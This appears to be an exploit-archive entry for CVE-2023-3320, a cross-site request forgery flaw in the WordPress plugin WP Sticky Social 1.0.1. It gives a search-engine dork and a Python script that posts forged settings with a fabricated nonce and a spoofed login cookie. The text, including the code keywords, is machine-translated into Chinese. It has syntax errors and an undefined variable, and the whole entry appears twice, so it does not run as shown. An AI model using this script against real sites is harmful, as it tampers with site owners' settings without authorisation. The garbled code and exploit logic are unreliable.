#利用标题: WP粘性社交1.0.1-跨站点请求伪造,以存储的跨站点脚本(XSS)
#Dork: inurl:〜/admin/views/admin.php
#日期: 2023-06-20
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#供应商homepage3360 https://wordpress.org/plugins/wp-sticky-social
#版本: 1.0.1(必需)
#在: Windows/Linux上测试
#CVE : CVE-2023-3320
导入请求
导入哈希布
进口时间
#设置目标网址
url='http://Example.com/wp-admin/admin.php?page=wpss_settings'
#设置用户代理字符串
user_agent='mozilla/5.0(Windows NT 10.0; Win64; x64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/58.0.3029.110 Safari/537.3'
#生成非CE值
nonce=hashlib.sha256(str(time.time())。encode('utf-8'))。hexdigest()
#设置数据有效载荷
有效载荷={
'wpss_nonce': nonce,
'wpss_setting_1'1':'value_1',
'wpss_setting_2':'value_2',
#根据需要添加其他设置
}
#设置请求标题
标题={
'用户代理: user_agent,
'参考器: URL,
'cookie':'wordpress_logged_in=1; WP-SETTINGS-1=编辑%3Dtinymce%26libraryContent%3DBROWSE%26uploader%%3DWP-PLUPLOAD%26urlbutton%3Dfile; wp-settings time-1=1495271983',
#根据需要添加其他标题
}
#发送邮政请求
响应=requests.post(url,data=有效载荷,标头=标题)
#检查响应状态代码
if antsphy.status_code==200:
打印(“要求成功”)
其他:
打印(“请求失败”)
#Dork: inurl:〜/admin/views/admin.php
#日期: 2023-06-20
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#供应商homepage3360 https://wordpress.org/plugins/wp-sticky-social
#版本: 1.0.1(必需)
#在: Windows/Linux上测试
#CVE : CVE-2023-3320
导入请求
导入哈希布
进口时间
#设置目标网址
url='http://Example.com/wp-admin/admin.php?page=wpss_settings'
#设置用户代理字符串
user_agent='mozilla/5.0(Windows NT 10.0; Win64; x64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/58.0.3029.110 Safari/537.3'
#生成非CE值
nonce=hashlib.sha256(str(time.time())。encode('utf-8'))。hexdigest()
#设置数据有效载荷
有效载荷={
'wpss_nonce': nonce,
'wpss_setting_1'1':'value_1',
'wpss_setting_2':'value_2',
#根据需要添加其他设置
}
#设置请求标题
标题={
'用户代理: user_agent,
'参考器: URL,
'cookie':'wordpress_logged_in=1; WP-SETTINGS-1=编辑%3Dtinymce%26libraryContent%3DBROWSE%26uploader%%3DWP-PLUPLOAD%26urlbutton%3Dfile; wp-settings time-1=1495271983',
#根据需要添加其他标题
}
#发送邮政请求
响应=requests.post(url,data=有效载荷,标头=标题)
#检查响应状态代码
if antsphy.status_code==200:
打印(“要求成功”)
其他:
打印(“请求失败”)